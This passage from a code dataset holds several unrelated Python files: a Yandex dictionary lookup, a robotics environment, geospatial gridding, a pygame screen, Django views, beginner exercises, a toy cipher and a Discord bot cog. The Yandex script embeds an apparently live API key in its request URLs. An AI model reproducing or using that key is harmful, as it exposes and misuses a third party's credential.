\"\"\"))\n\n if ceviri_num == 1:\n aranan_kelime = input(\"\\nTurkce-Ingilizce ceviri icin Aranan kelimeyi giriniz: \")\n url = (\"https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key=dict.1.1.20210105T190252Z.1bf16a1a72629b11.f723d8b4f7f900313a0bcb5af8faab64c3fb2e46&lang=tr-en&text=\" + aranan_kelime)\n r = requests.get(url)\n data = r.json()\n tr_eng_ilk_anlam = data[\"def\"][0][\"tr\"][0][\"text\"]\n synonims = data[\"def\"][0][\"tr\"][0][\"syn\"]\n print(\"Kelimenin ilk ve en cok kullanilan karsiligi:\\n\")\n print(tr_eng_ilk_anlam)\n print(\"\\nKelimenin esanlamlilari ve kullanilislari:\\n\")\n for i in synonims:\n print(i[\"text\"])\n else:\n aranan_kelime = input(\"\\nIngilizce-Turkce ceviri icin Aranan kelimeyi giriniz: \")\n url = (\"https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key=dict.1.1.20210105T190252Z.1bf16a1a72629b11.f723d8b4f7f900313a0bcb5af8faab64c3fb2e46&lang=en-tr&text=\" + aranan_kelime)\n r = requests.get(url)\n data = r.json()\n eng_tr_ilk_anlam = data[\"def\"][0][\"tr\"][0][\"text\"]\n eng_tr_synonims = data[\"def\"][0][\"tr\"][0][\"syn\"]\n print(\"Kelimenin ilk ve en cok kullanilan karsiligi:\\n\")\n print(eng_tr_ilk_anlam)\n print(\"\\nKelimenin esanlamlilari ve kullanilislari:\\n\")\n for i in eng_tr_synonims:\n print(i[\"text\"])\n\n except:\n print(\"\\nAranan kelime bulunamadi lutfen baska bir kelime giriniz!\")\n","sub_path":"Apps/Translators/Yandex/Yandex Translator json tr-en dictionary v2.0.py","file_name":"Yandex Translator json tr-en dictionary v2.0.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191595101","text":"from HER.envs import picknmove\nimport numpy as np \nfrom gym.envs.robotics.utils import mocap_set_action\n\nclass BaxterEnv(picknmove.BaxterEnv):\n \n def _get_rel_ob(self, absolute_ob):\n gripper_pos = absolute_ob[:self.space_dim]\n object_pos = absolute_ob[self.space_dim:2*self.space_dim]\n target_pos = absolute_ob[-self.space_dim:]\n\n return 
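# --- Small illustrative variant of the dictionary lookup above: let requests build the
# query string via params= instead of concatenating it by hand. The key below is a
# placeholder, not a real credential, and the response layout is assumed to match the
# record (def -> tr -> text).
import requests

BASE = "https://dictionary.yandex.net/api/v1/dicservice.json/lookup"
params = {"key": "YOUR_API_KEY", "lang": "en-tr", "text": "run"}
data = requests.get(BASE, params=params).json()
print(data["def"][0]["tr"][0]["text"])   # first, most common translation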
np.concatenate((gripper_pos, object_pos - gripper_pos, target_pos - object_pos))\n\n def _get_abs_ob(self, rel_ob):\n gripper_pos = rel_ob[:self.space_dim]\n object_pos = rel_ob[self.space_dim:2*self.space_dim] + gripper_pos\n target_pos = rel_ob[-self.space_dim:] + object_pos\n\n return np.concatenate((gripper_pos, object_pos, target_pos))\n\n def reset_model(self,\n # initial config of the end-effector\n gripper_pos = np.array([0.6 , 0.3 , 0.15]),\n ctrl=np.array([0.04, -0.04]),\n no_change_required = False\n ):\n\n absolute_ob = super(BaxterEnv, self).reset_model(gripper_pos = gripper_pos,\n ctrl=ctrl,\n no_change_required = no_change_required)\n return self._get_rel_ob(absolute_ob) \n\n def step(self, action):\n ob, total_reward, done, info = super(BaxterEnv, self).step(action)\n return self._get_rel_ob(ob), total_reward, done, info\n\n def apply_hindsight(self, states, actions, goal_state):\n '''generates hindsight rollout based on the goal\n '''\n goal = goal_state[self.space_dim:2*self.space_dim] ## this is the absolute goal location = obj last loc\n # enter the last state in the list\n states.append(goal_state)\n num_tuples = len(actions)\n\n her_states, her_rewards = [], []\n # make corrections in the first state \n states[0][-self.space_dim:] = goal.copy() - states[0][self.space_dim:2*self.space_dim]\n her_states.append(states[0])\n for i in range(1, num_tuples + 1):\n state = states[i]\n state[-self.space_dim:] = goal.copy() - state[self.space_dim:2*self.space_dim] # copy the new goal into state\n \n absolute_state = self._get_abs_ob(state)\n reward = self.calc_reward(absolute_state)\n her_states.append(state)\n her_rewards.append(reward)\n\n return her_states, her_rewards\n\n\n\n","sub_path":"HER/envs/picknmove_rel.py","file_name":"picknmove_rel.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"570483727","text":"import click\nfrom datetime import datetime, timedelta, date\nfrom dateutil.relativedelta import relativedelta\n\nfrom mla_bilat_agreements import mla_bilat_agreements\n\n\ndef clean_list(organisations, org_list):\n # Extract the comma-separated organisation symbols and removed\n # leading and trailing spaces (strip function)\n orgs = [item.strip() for item in list(set(organisations.split(',')))]\n if len(orgs) < 2:\n raise click.BadOptionUsage(\n option_name=\"orgs\",\n message=\"A comma separated list of at least two \"\n \"organisations must be provided with option --orgs.\")\n orgs = list(set(orgs))\n for org in orgs:\n if not(org in org_list.keys()):\n raise click.BadOptionUsage(\n option_name=\"orgs\",\n message=\"'{:}' is not in the list of \"\n \"the participating organisations.\"\n .format(org))\n return(orgs)\n\n\ndef all_dates(from_, to_):\n dates = []\n delta = to_ - from_\n for d in range(delta.days + 1):\n day = from_ + timedelta(days=d)\n dates.append(day)\n return dates\n\n\ndef add_years(dates, years):\n new_dates = []\n for d in dates:\n d = d + relativedelta(years=years)\n new_dates.append(d)\n return new_dates\n\n\ndef select_possible_dates(dates, from_, to_):\n date_list = []\n for d in dates:\n morning = datetime.combine(d, datetime.min.time())\n evening = datetime.combine(d, datetime.max.time())\n if (morning >= from_) and (evening <= to_):\n date_list.append(d)\n return(date_list)\n\n\ndef gen_start_dates(from_, months):\n date_list = []\n for x in range(months):\n date_list.append(datetime(from_.year, x+1, 1))\n if (from_.day == 1):\n from__month 
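# --- Hypothetical round-trip check (values invented) of the relative observation layout
# used by the wrapper above: obs = [gripper, object - gripper, target - object], and the
# inverse mapping recovers the absolute positions.
import numpy as np

dim = 3
gripper = np.array([0.60, 0.30, 0.15])
obj     = np.array([0.70, 0.25, 0.05])
target  = np.array([0.50, 0.40, 0.05])

rel = np.concatenate((gripper, obj - gripper, target - obj))
back = np.concatenate((rel[:dim],
                       rel[dim:2*dim] + rel[:dim],
                       rel[2*dim:] + rel[dim:2*dim] + rel[:dim]))
assert np.allclose(back, np.concatenate((gripper, obj, target)))
print("relative <-> absolute round trip OK")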
= from_.month\n else:\n from__month = from_.month + 1\n start_date_list = []\n for d in date_list:\n d = d + relativedelta(months=from__month - 1)\n start_date_list.append(d)\n return start_date_list\n\n\ndef bilateral_agreement(lead, partner, submission_dates):\n \"\"\"Checks if there is a collaboration agreement between the two\n organisations 'lead' and 'partner' in the dates included in\n the 'submission_dates' array. If there is an agreement, checks\n if the identified submission dates are covered by the agreement.\"\"\"\n for agreement in mla_bilat_agreements:\n if (lead in agreement['orgs']) and (partner in agreement['orgs']):\n possible_dates = []\n for d in submission_dates:\n if d >= agreement['from'] and d <= agreement['to']:\n possible_dates.append(d)\n return {'agreement': True, 'possible_dates': possible_dates}\n return {'agreement': False, 'possible_dates': []}\n\n\ndef add_comment(comment, new_string):\n if (comment != ''):\n comment += '\\n'\n return comment + new_string\n","sub_path":"mla_tools.py","file_name":"mla_tools.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"120866639","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\ntry: range=xrange\nexcept: pass\n\ndef transform_coordinates(x, y, epsg_in, epsg_out):\n \"\"\"\n Transform between any coordinate system.\n\n Requires pyproj\n \"\"\"\n import pyproj\n proj_in = pyproj.Proj(\"+init=EPSG:\"+str(epsg_in))\n proj_out = pyproj.Proj(\"+init=EPSG:\"+str(epsg_out))\n return pyproj.transform(proj_in, proj_out, x, y)\n\n\ndef trim(coords, data, extent, buffer_amount=0.0):\n \"\"\"\n Grid a smaller section of a large dataset taking into\n consideration transformations into various coordinate\n reference systems (CRS)\n \n Parameters\n ----------\n coords : geographical / projected coordinates\n data : values corresponding to coordinates\n extent : box contained within the data\n buffer : amount of buffer to include (default=0.0)\n\n Returns\n -------\n coords_trim : trimmed coordinates\n data_trim : trimmed data array\n \"\"\"\n xmin, xmax, ymin, ymax = extent\n\n # Extract only the data within the extent\n data_mask = np.ones(data.shape[0], dtype=bool)\n\n # Add a 1 percent buffer zone\n x_buffer = buffer_amount*(xmax - xmin)\n y_buffer = buffer_amount*(ymax - ymin)\n\n mask_e = coords[:,0] < xmin - x_buffer\n mask_w = coords[:,0] > xmax + x_buffer\n mask_n = coords[:,1] < ymin - y_buffer\n mask_s = coords[:,1] > ymax + y_buffer\n data_mask[mask_n] = False\n data_mask[mask_s] = False\n data_mask[mask_e] = False\n data_mask[mask_w] = False\n \n data_trim = data[data_mask]\n coords_trim = coords[data_mask]\n\n return coords_trim, data_trim\n\n\n\ndef grid(coords, data, extent, shape=None, epsg_in=None, epsg_out=None, **kwargs):\n \"\"\"\n Grid a smaller section of a large dataset taking into\n consideration transformations into various coordinate\n reference systems (CRS)\n \n Parameters\n ----------\n coords : geographical coordinates\n data : values corresponding to coordinates\n extent : box contained within the data in espg_out\n coordinates\n shape : size of the box (nrows,ncols)\n : if None, shape is estimated from coords spacing\n epsg_in : CRS of data (if transformation is required)\n epsg_out : CRS of grid (if transformation is required)\n kwargs : keyword arguments to pass to griddata from\n : scipy.interpolate.griddata\n \n Returns\n -------\n grid : rectangular section of data bounded by extent\n \"\"\"\n 
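# --- Quick illustration (dates invented) of the two date tools used above: timedelta
# enumerates every day in a range, while relativedelta shifts whole calendar years and
# clamps Feb 29 to Feb 28 instead of adding a fixed 365 days.
from datetime import date, timedelta
from dateutil.relativedelta import relativedelta

start, end = date(2020, 2, 27), date(2020, 3, 2)
days = [start + timedelta(days=d) for d in range((end - start).days + 1)]
print(days[0], "...", days[-1], "->", len(days), "days")       # 5 days inclusive
print(date(2020, 2, 29) + relativedelta(years=1))               # 2021-02-28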
from scipy.interpolate import griddata\n xmin, xmax, ymin, ymax = extent\n \n if type(epsg_in) != type(None):\n xt, yt = transform_coordinates(np.array([xmin, xmin, xmax, xmax]),\\\n np.array([ymin, ymax, ymin, ymax]),\\\n epsg_out, epsg_in)\n # find the coordinates that will completely\n # engulf the extent\n xtmin, xtmax = min(xt), max(xt)\n ytmin, ytmax = min(yt), max(yt)\n else:\n xtmin, xtmax = xmin, xmax\n ytmin, ytmax = ymin, ymax\n\n xtextent = [xtmin, xtmax, ytmin, ytmax]\n\n # trim data - buffer = 1%\n coords_trim, data_trim = trim(coords, data, xtextent, 0.01)\n\n\n if type(epsg_in) != type(None):\n # convert back to output CRS\n xtrim, ytrim = transform_coordinates(coords_trim[:,0],\\\n coords_trim[:,1],\\\n epsg_in, epsg_out)\n coords_trim = np.column_stack([xtrim, ytrim])\n\n\n if shape == None:\n # estimate based on the data spacing\n xunique = np.unique(coords_trim[:,0])\n yunique = np.unique(coords_trim[:,1])\n dx = np.diff(xunique).mean()\n dy = np.diff(yunique).mean()\n nc = int((xtmax - xtmin)/dx)\n nr = int((ytmax - ytmin)/dy)\n print(\"using nrows={}, ncols={} with cell spacing of {}\".format(nr,nc,(dy,dx)))\n else:\n nr, nc = shape\n\n # interpolate\n\n xcoords = np.linspace(xmin, xmax, nc)\n ycoords = np.linspace(ymin, ymax, nr)\n xq, yq = np.meshgrid(xcoords, ycoords)\n\n vq = griddata(coords_trim, data_trim, (xq, yq), **kwargs)\n return vq\n\n\ndef optimise_surfaces(surface1, surface2, sigma):\n \"\"\"\n Optimise the misfit between surface1 and surface2\n\n surface1 and surface2 are normalised between 0 and 1\n and their residual is minimised, weighted by sigma\n\n Parameters\n ----------\n surface1 : starting surface (can be flat)\n surface2 : surface to match to\n sigma : uncertainty of fitting coefficients\n\n Returns\n -------\n surface3 : optimised surface\n\n Notes\n -----\n The Krylov method uses a Krylov approximation for the\n inverse Jacobian as it is suitable for large problems\n \"\"\"\n from scipy.optimize import root\n \n def objective_function(x, x0, sigma_x0):\n return (x - x0)**2/sigma_x0**2\n \n sigma = sigma.ravel()\n \n s1 = surface1.flatten()\n s1 -= s1.min()\n s1 /= s1.max()\n \n s2 = surface2.flatten()\n s2 -= s2.min()\n s2 /= s2.max()\n \n # starting point should be at prior\n x0 = s1\n \n sol = root(objective_function, x0, method='krylov')\n return sol.x.reshape(surface1.shape)\n","sub_path":"pycurious/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651597845","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nX = np.linspace(-6, 6, 1024)\nY = np.sinc(X)\n\nX_detail = np.linspace(-3, 3, 1024)\nY_detail = np.sinc(X_detail)\n\nplt.plot(X, Y, c = 'k')\n\nsub_axes = plt.axes([.6, .6, .25, .25])\nsub_axes.plot(X_detail, Y_detail, c = 'k')\n\nplt.setp(sub_axes)\n\nplt.show()","sub_path":"Aula 02/Exercicio 03 - Resumo - Capitulo 04/Exemplo_05.py","file_name":"Exemplo_05.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152977323","text":"def start(score, game_id):\n #defining every library needed\n import sys\n import pygame\n import os\n import menu\n import astrodoge\n import spacestrike\n import SpaceBound\n import Stranded\n import sumo_smash\n import cheat_sheet\n import soundboard\n import highscore\n from time import sleep\n\n #setting variables\n FPS = 30\n X = 500\n Y = 100\n WHITE = (255, 
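# --- Self-contained sketch of the scipy.interpolate.griddata call the grid() helper above
# builds up to: scattered samples interpolated onto a regular mesh (synthetic data, no CRS
# transform involved).
import numpy as np
from scipy.interpolate import griddata

rng = np.random.default_rng(0)
pts = rng.uniform(0, 1, size=(200, 2))                   # scattered (x, y) locations
vals = np.sin(3 * pts[:, 0]) * np.cos(3 * pts[:, 1])
xq, yq = np.meshgrid(np.linspace(0, 1, 50), np.linspace(0, 1, 40))
vq = griddata(pts, vals, (xq, yq), method="linear")
print(vq.shape)                                           # (40, 50)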
255, 255)\n BLACK = (0, 0, 0)\n\n #setting the settings of pygame itself\n screen = pygame.display.set_mode((900,900))\n pygame.display.set_caption(\"Welp, you can always try again!\")\n font = pygame.font.Font('resource/fonts/Arcadepix.ttf', 40)\n clock = pygame.time.Clock()\n os.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (X,Y)\n define_location = \"main_menu\"\n \n #initializing pygame's mixer\n # pygame.mixer.init()\n # pygame.mixer.music.load(\"resource/music/main_menu/main_menu.ogg\")\n # pygame.mixer.music.play(-1)\n\n #initiate a image loader\n def load_image(name):\n image = pygame.image.load(name)\n return image\n \n #create a sprite class to animate \n class animated_select_planet(pygame.sprite.Sprite):\n def __init__(self):\n super(animated_select_planet, self).__init__()\n self.images = []\n self.images.append(load_image('resource/images/game_over/tekst/game_over_1.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_2.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_3.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_4.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_5.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_6.png'))\n self.images.append(load_image('resource/images/game_over/tekst/game_over_7.png'))\n self.index = 0\n self.image = self.images[self.index]\n self.rect = pygame.Rect(25, 130, 250, 80)\n\n def update(self):\n self.index += 1\n sleep(0.1)\n if self.index >= len(self.images):\n self.index = 0\n count = 0\n self.image = self.images[self.index]\n\n #start the main menu board.\n def start_game_over():\n #set background\n background = pygame.image.load('resource/images/game_over/game_overbg.png').convert()\n background_rect = background.get_rect()\n screen.blit(background, background_rect)\n buttons_game_over()\n #game over buttons ready\n def buttons_game_over():\n quit_button = pygame.image.load('resource/images/game_over/button_quit.png').convert()\n retry_button = pygame.image.load('resource/images/game_over/button_restart.png').convert()\n quit_rect = quit_button.get_rect()\n retry_rect = quit_button.get_rect()\n screen.blit(quit_button, (325,550))\n screen.blit(retry_button, (325,470))\n #score text to screen\n def text_score(score, highscore): \n scoretext = font.render(\"Your Score \", 1, WHITE)\n score = font.render(\" {0}\".format(score), 1, WHITE)\n scorehightext = font.render(\"Your highscore \", 1, WHITE)\n scorehigh = font.render(\" {0}\".format(highscore), 1, WHITE)\n screen.blit(scoretext, (250, 385))\n screen.blit(score, (250, 415))\n screen.blit(scorehightext, (500, 385))\n screen.blit(scorehigh, (500, 415))\n\n\n\n #beginning of the main loop\n main_loop = True\n soundboard.game_over(score) \n my_sprite = animated_select_planet()\n my_group = pygame.sprite.Group(my_sprite)\n highscore.save(score, game_id)\n \n while main_loop:\n #reset the screen and set screen image's\n screen.fill(BLACK)\n clock.tick(FPS)\n start_game_over()\n my_group.update()\n my_group.draw(screen)\n highscorer = highscore.read(game_id)\n text_score(score, highscorer)\n pygame.display.flip()\n\n #check events\n for evento in pygame.event.get():\n #define event's of quiting the game.\n if evento.type == pygame.QUIT:\n pygame.quit()\n quit()\n #printing every event that's happening within the python script.\n print(evento)\n #Catch mouse position and if it's pressed on the button\n if evento.type == 
pygame.MOUSEBUTTONDOWN:\n if pygame.mouse.get_pos()[0] >= 325 and pygame.mouse.get_pos()[1] >= 550:\n if pygame.mouse.get_pos()[0] <= 593 and pygame.mouse.get_pos()[1] <= 615:\n menu.start_menu()\n if pygame.mouse.get_pos()[0] >= 315 and pygame.mouse.get_pos()[1] >= 470:\n if pygame.mouse.get_pos()[0] <= 593 and pygame.mouse.get_pos()[1] <= 535:\n cheat_sheet.start(game_id)\n \n pygame.quit()\n quit()\n","sub_path":"game_over.py","file_name":"game_over.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"249585450","text":"n = int(input(\"Enter a 3-digit number: \"))\r\n\r\nz = n % 10\r\nn = n // 10\r\n\r\ny = n % 10\r\nn = n // 10\r\n\r\nx = n % 10\r\nn = n // 10\r\n\r\n# get largest number\r\nlargest = x\r\n\r\nif y >= largest and y >= z:\r\n largest = y\r\n\r\nif z >= largest and z >= y:\r\n largest = z\r\n\r\nprint(\"Largest digit: \" + str(largest))\r\n\r\n# get smallest number\r\nsmallest = x\r\n\r\nif y <= smallest and y <= z:\r\n smallest = y\r\n\r\nif z <= smallest and z <= y:\r\n smallest = z\r\n\r\nprint(\"Smallest digit: \" + str(smallest))\r\n\r\nmiddle = z\r\n\r\nif (largest == z and smallest == y) or (smallest == z and largest == y):\r\n middle = x\r\nelif (largest == z and smallest == x) or (smallest == z and largest == x):\r\n middle = y\r\n\r\nmax_number = largest * 100 + middle * 10 + smallest\r\nmin_number = smallest * 100 + middle * 10 + largest\r\n\r\nprint(\"Max number with those digits is: \" + str(max_number))\r\nprint(\"Min number with those digits is: \" + str(min_number))\r\n","sub_path":"Week 1/Task 23.py","file_name":"Task 23.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"180657649","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .import forms\nfrom .models import SubsidyTypes\n\n\ndef subsidy_types(request):\n # login_id = request.session['logid']\n model_object = SubsidyTypes.objects.all()\n\n if request.method == 'POST':\n form = forms.SubTypeForms(request.POST, request.FILES)\n if form.is_valid():\n subtypeobj = form.cleaned_data\n subtypename = subtypeobj['subsidy_type_name']\n subtypesub = subtypeobj['subsidy_type_sub_perc']\n subtypeself = subtypeobj['subsidy_type_self_perc']\n sp = SubsidyTypes(subsidy_type_name=subtypename, subsidy_type_sub_perc=subtypesub, subsidy_type_self_perc=subtypeself)\n sp.save()\n return redirect('subsidy_types:SubTypeForms')\n else:\n form = forms.SubTypeForms\n\n return render(request, \"subsidy_types/sub_types.html\", {'form': form, 'data': model_object})\n\n\ndef edit_subtypes(request, pk):\n template = 'subsidy_types/sub_types.html'\n post = get_object_or_404(SubsidyTypes, pk=pk)\n model_object = SubsidyTypes.objects.all()\n if request.method == 'POST':\n form = forms.SubTypeForms(request.POST, instance=post)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n return redirect('subsidy_types:SubTypeForms')\n else:\n form = forms.SubTypeForms(instance=post)\n context = {\n 'form': form,\n 'post': post,\n 'data': model_object,\n }\n return render(request, template, context)\n\n\ndef delete_subtypes(request, pk):\n post = get_object_or_404(SubsidyTypes, pk=pk)\n post.delete()\n return 
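# --- Hedged alternative (coordinates approximated from the record) to the four manual
# comparisons used for the quit/retry buttons above: pygame.Rect.collidepoint() keeps the
# hit-test for each button in one place.
import pygame

quit_rect  = pygame.Rect(325, 550, 268, 65)    # x, y, width, height
retry_rect = pygame.Rect(315, 470, 278, 65)

def hit(pos):
    if quit_rect.collidepoint(pos):
        return "quit"
    if retry_rect.collidepoint(pos):
        return "retry"
    return None

print(hit((400, 580)), hit((400, 500)), hit((10, 10)))   # quit retry None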
redirect('subsidy_types:SubTypeForms')\n","sub_path":"Gconnect/subsidy_types/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"322892337","text":"otp = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\",\" \"]\n\nkey = list(open(\"chiave.txt\").read())\n\ndef appendOut(letter,idx):\n tmp = otp.index(letter) + otp.index(key[idx])\n if tmp > len(otp) - 1:\n tmp -= len(otp)\n return otp[tmp]\n\ndef cifra(text):\n output = \"\"\n daCifrare = list(text)\n i = 0\n for x in daCifrare:\n if i < len(key):\n output += appendOut(x,i)\n else:\n i = 0\n output += appendOut(x,i)\n i += 1\n\n f = open(\"cifrato.txt\",\"w\")\n f.write(output)\n f.close()\n\ncifra(input(\"Testo da cifrare: \").upper())","sub_path":"UFCrypto/Primo Esercizio/cifra.py","file_name":"cifra.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"50807485","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nn=input('digite a quantidade de elementos:')\na=[]\n\nfor i in range(0,len(a),1):\n a.append(input('digite um elemento:'))\n\nsomai=0\nconti=0\nfor i in range(0,len(a),1):\n if a[i]%2==1:\n somai=somai+a[i]\n conti=conti+1\n\nsomap=0\ncontp=0\nfor i in range(0,len(a),1):\n if a[i]%2==0:\n somap=somap+a[i]\n contp=contp+1\n\nprint(somai)\nprint(somap)\nprint(conti)\nprint(contp)\nprint(len(a))\n \n \n \n \n \n \n \n \n","sub_path":"moodledata/vpl_data/45/usersdata/97/15557/submittedfiles/lista1.py","file_name":"lista1.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222881324","text":"##############################################################################\r\n################################ IMPORTS: ####################################\r\n##############################################################################\r\nimport sys\r\nimport random\r\nimport string\r\n\r\n##############################################################################\r\n############################## FUNCTIONS: ####################################\r\n##############################################################################\r\ndef game(NumberOfDigits):\r\n\t\"\"\"This function takes in the number of digits and generates a random \r\n\tstring confirming to the specified number of digits. It then asks the user \r\n\tto guess the random number while providing basic feedback to the user \r\n\tdepending on his/her guesses. The funtion terminates once the user has \r\n\tguessed the numner correctly or exhausted his trials\r\n\t\"\"\"\r\n\tNum_Str = ''.join(random.choice(string.digits) for _ in range(NumberOfDigits)) #Generating a random number of the specified number of digits\r\n\t# Num_Str = '007'\r\n\tNumberOfTries = 0\r\n\tMaxTries = (2**NumberOfDigits) + NumberOfDigits\r\n\tBull = 0\r\n\tCow = 0\r\n\r\n\tprint (\"Let's play the mimsmind1 game. You have {0} guesses.\" .format(MaxTries))\r\n\r\n\tGuessStr = raw_input(\"Guess a {0}-digit number: \" .format(NumberOfDigits))\r\n\tNumberOfTries += 1\r\n\twhile True:\t\t\t\t\t\t\t#This loop with keep asking the user to guess the number till he/she guesses the correct number\r\n\t\tif NumberOfTries >= MaxTries:\r\n\t\t\tprint (\"Sorry. 
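# --- Minimal sketch of the same shift-by-key idea as cifra.py above, with the key inline
# instead of read from chiave.txt (key and plaintext here are made up).
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ "

def encrypt(text, key):
    out = []
    for i, ch in enumerate(text.upper()):
        shift = ALPHABET.index(key[i % len(key)])
        out.append(ALPHABET[(ALPHABET.index(ch) + shift) % len(ALPHABET)])
    return "".join(out)

print(encrypt("HELLO WORLD", "KEY"))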
You did not guess the number in {0} tries. The correct number is {1}\" .format(MaxTries, Num_Str))\r\n\t\t\tbreak\r\n\t\ttry:\t\t\t\t\t\t\t#Validating whether the given input is a valid integer\r\n\t\t\tGuessNum = int(GuessStr)\r\n\t\texcept:\r\n\t\t\tGuessStr = raw_input(\"Invalid input. Try again: \")\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tif len(GuessStr) != NumberOfDigits:\t\t#Validating whether the given input contains the specified number of digits\r\n\t\t\t\tGuessStr = raw_input(\"Invalid input. Try again: \")\r\n\t\t\t\tcontinue\r\n\t\t\telif GuessStr == Num_Str:\r\n\t\t\t\tprint (\"Congratulations. You guessed the correct number in {0} tries\" .format(NumberOfTries))\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tBull = 0\r\n\t\t\t\tCow = 0\r\n\t\t\t\tfor i in range(len(GuessStr)):\t\t#This loop will count the number of bulls\r\n\t\t\t\t\tfor j in range(len(Num_Str)):\r\n\t\t\t\t\t\tif GuessStr[i] == Num_Str[j] and i == j:\r\n\t\t\t\t\t\t\tBull += 1\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\tTemp_Num_Str = Num_Str \t\t\t\t#Making a temporary variable to store the random generated number for the next guess\r\n\t\t\t\tfor letter in GuessStr:\t\t\t\t#This loop will count the number of cows (including bulls)\r\n\t\t\t\t\tif letter in Temp_Num_Str:\r\n\t\t\t\t\t\tindex = Temp_Num_Str.find(letter)\r\n\t\t\t\t\t\tCow += 1\r\n\t\t\t\t\t\tTemp_Num_Str = Temp_Num_Str[:index] + Temp_Num_Str[index+1:]\r\n\t\t\t\t\t\t\r\n\t\t\t\tCow = Cow - Bull\t\t\t\t\t#Removing the double counts in cows\r\n\t\tGuessStr = raw_input(\"{0} bull(s), {1} cow(s). Try again: \" .format(Bull,Cow))\r\n\t\tNumberOfTries += 1\t\t\t\t\t\t\t#Incrementing the trial counter\r\n\r\n##############################################################################\r\n################################ MAIN: #######################################\r\n##############################################################################\r\ndef main():\r\n\ttry:\r\n\t\tNumberOfDigits = int(sys.argv[1])\r\n\texcept:\r\n\t\tNumberOfDigits = 3\r\n\tgame(NumberOfDigits)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"mimsmind1.py","file_name":"mimsmind1.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"444972004","text":"from discord.ext import commands\nfrom BotUtils import REST, getAPIKey, escapeURL, isURL\nimport discord\nfrom datetime import datetime\n\nclass News(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n \n @commands.command(name='news')\n async def NewsAPI(self, ctx, *, query):\n \"\"\"Gets news\"\"\"\n data = await REST(f\"http://newsapi.org/v2/everything?qInTitle={escapeURL(query)}&from={datetime.now().strftime('%Y-%m-%d')}&sortBy=popularity&pageSize=1&apiKey={getAPIKey('newsapi')}\")\n\n if len(data['articles']) == 0:\n await ctx.reply('No articles found.')\n return\n data = data['articles'][0]\n embed = discord.Embed(colour=0xf5c518)\n embed.title = data['title']\n embed.url = data['url']\n embed.description = data['description']\n embed.timestamp = datetime.fromisoformat(data['publishedAt'].replace('Z',''))\n if 'urlToImage' in data and isURL(str(data['urlToImage'])):\n embed.set_image(url=data['urlToImage'])\n embed.set_footer(text=f\"{data['source']['name']} | Written by {data['author']}. 
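# --- Compact, purely illustrative alternative to the bull/cow counting loops above:
# zip() counts exact-position matches (bulls) and a Counter intersection counts shared
# digits regardless of position, from which the bulls are subtracted to get cows.
from collections import Counter

def bulls_and_cows(secret, guess):
    bulls = sum(s == g for s, g in zip(secret, guess))
    shared = sum((Counter(secret) & Counter(guess)).values())
    return bulls, shared - bulls

print(bulls_and_cows("007", "071"))   # (1, 1)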
Published \")\n await ctx.reply(embed=embed)\n\ndef setup(bot):\n bot.add_cog(News(bot))\n","sub_path":"cogs/apis/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139062931","text":"from django.urls import path, re_path\nfrom . import views\n\nurlpatterns = [\n\n # /home/\n path('', views.index, name='index'),\n\n # /f1better/index.html\n path('index.html', views.index, name='index'),\n\n path('register', views.register, name='register'),\n path('register.html', views.register, name='register'),\n\n path('login', views.login, name='login'),\n path('login.html', views.login, name='login'),\n\n path('logout', views.logout, name='logout'),\n]","sub_path":"f1better/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"466108956","text":"import numpy as np\nimport math\nfrom collections import defaultdict\n\n\nclass Point(object):\n \"\"\"docstring for Point\"\"\"\n def __init__(self, x,y):\n super(Point, 